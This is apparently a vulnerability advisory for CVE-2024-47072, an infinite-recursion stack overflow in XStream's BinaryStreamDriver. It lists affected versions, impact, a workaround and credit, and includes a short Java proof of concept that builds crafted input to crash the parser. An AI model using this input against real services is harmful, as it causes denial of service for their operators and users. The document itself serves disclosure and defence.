### Key Information #### Vulnerability Description - **CVE ID**: CVE-2024-47072 - **Affected Versions**: All versions up to and including version 1.4.20, if using XStream's BinaryStreamDriver. - **Description**: XStream provides a BinaryStreamDriver that uses its own optimized serialization format. The format uses IDs for deduplication of string values. During deserialization, the reader's implementation simply uses recursive processing of the next normal token in the data stream. However, by manipulating the input data, an infinite recursion can be triggered, leading to a stack overflow and resulting in a denial-of-service. #### Reproduction Steps 1. Prepare manipulated data. 2. Provide the data as input to an XStream instance using BinaryDriver. 3. Use the following code example: ```java final byte[] byteArray = new byte[36000]; for (int i = 0; i < byteArray.length / 4; i++) { byteArray[i * 4] = 10; byteArray[i * 4 + 1] = -127; byteArray[i * 4 + 2] = 0; byteArray[i * 4 + 3] = 0; } XStream xstream = new XStream(new BinaryStreamDriver()); xstream.fromXML(new ByteArrayInputStream(byteArray)); ``` #### Impact - Remote attackers can trigger a stack overflow error by manipulating the input stream, leading to a denial-of-service, provided the instance uses BinaryStreamDriver. #### Workarounds - A simple workaround is to catch StackOverflowError in client code calling XStream. No other known workarounds exist when using BinaryStreamDriver. #### Credit - The vulnerability was discovered and reported to XStream by Alexis Challande of Trail Of Bits.